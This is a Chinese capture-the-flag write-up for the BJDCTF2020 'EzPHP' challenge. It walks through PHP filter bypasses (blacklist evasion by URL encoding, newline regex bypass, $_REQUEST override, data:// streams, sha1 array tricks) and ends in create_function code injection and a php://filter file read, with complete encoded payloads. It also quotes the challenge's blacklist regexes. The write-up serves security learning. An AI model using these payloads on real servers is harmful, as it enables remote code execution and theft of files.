[BJDCTF2020]EzPHP
考点:php的各种bypass
F12发现注释
<!-- GFXEIM3YFZYGQ4A= -->
base32解密得到1nD3x.php
,访问后得到源码
Level1
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}
对$_SERVER['QUERY_STRING']
魔术变量进行了黑名单过滤,
<?php
echo $_SERVER['QUERY_STRING'];
echo "<br>";
echo $_GET['a'];
通过上面例子我们发现$_SERVER['QUERY_STRING']
并不会把我们的内容进行转义,从而我们可以利用这一特征绕过所有的黑名单
全编码找不到,就自己写了个小脚本
code = input()
url = ''
for i in code:
if i == '=' or i == '&':
url += i
continue
url += '%' + hex(ord(i))[2:]
print(url)
Level2
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');
第一个if
只要不用http和https
就好了,重点是第二个if
,这里我们使用换行符%0a
进行绕过
debu=aqua_is_cute%0a
Level3
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
使用了$_REQUEST
魔术变量,它默认情况下包含了$_GET,$_POST和$_COOKIE
的数组。
注意:
由于 $_REQUEST 中的变量通过 GET,POST 和 COOKIE 输入机制传递给脚本文件,因此可以被远程用户篡改而并不可信。这个数组的项目及其顺序依赖于 PHP 的 request_order 和 variables_order 指令的配置。
request_order
中是这样说的
该指令描述了 PHP 将 GET、POST 和 Cookie 变量注册到 _REQUEST 数组中的顺序。注册是从左到右完成的,新值覆盖旧值。
所以说如果你传入了同名的$_POST
变量,将会覆盖掉$_GET
,从这里出发,我们就可以轻松绕过
GET:debu=aqua_is_cute%0a
POST:debu=1
Level4
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");
这里的$file
是在Level2
中通过GET
传参进入的,这里我们用到了data流协议
GET:file=data://text/plain,debu_debu_aqua
POST:file=2
Level5
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
这里sha1
绕过,和md5
绕过方式相同,使用数组绕过即可
GET:shana[]=1&passwd[]=2
因为本身传入的值就是数字,所以不需要再POST
Level6
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
}
这里是这个题的重难点,也是看了一些大佬的WP才给做出来,这里用到了像sql注入
一样的思想进行了代码注入。such as:
这里code
和arg
变量都是可控的(通过Level5的extract函数
),遇到这种情况我们首先需要想到Function handling Functionsj即函数处理函数
,经过查找,发现符合参数要求
的只有create_function
create_function(string
$args
, string$code
): string根据传递的参数创建一个匿名函数,并为其返回一个唯一的名称。
args:函数参数
code:功能代码
demo
$code = 'echo $a;';
$b = create_function('$a', $code);
echo $b(1);
输出==>1
通过实例我们大概构思一下这个函数如何生成的
function b(args){
code
}
通过上述结构我们尝试注入恶意代码:
function b(args){
}eval($_GET['cmd']);//
}
即code=}eval($_GET['cmd']);//
这里正则过滤了很多输出语句,这里使用var_dump(get_defined_vars())
输出常量
flag[code]=create_function&flag[arg]=}var_dump(get_defined_vars());//
PS:以上所有payload请自行编码哦!
GET:
%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61%5b%5d=%31&%70%61%73%73%77%64%5b%5d=%32&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&%66%6c%61%67%5b%61%72%67%5d=%7d%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f
POST:
debu=1&file=2
在最后得到:
I hid the real flag in rea1fl4g.php
然后我们使用伪协议进行读取
require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php)
但是我们还要绕过正则,这里我们可以使用异或
来绕过,运算符在被包含时的时候会正常执行。
<?php
$code = 'php://filter/read=convert.base64-encode/resource=rea1fl4g.php';
echo urlencode(~$code);
输出==>%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F
GET:
%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61%5b%5d=%31&%70%61%73%73%77%64%5b%5d=%32&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&%66%6c%61%67%5b%61%72%67%5d=}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//
POST:debu=1&file=2
将得到的内容base64解密即可获得flag
标签:65%,64%,GET,code,9A%,EzPHP,BJDCTF2020,61% From: https://www.cnblogs.com/seizer/p/17035715.html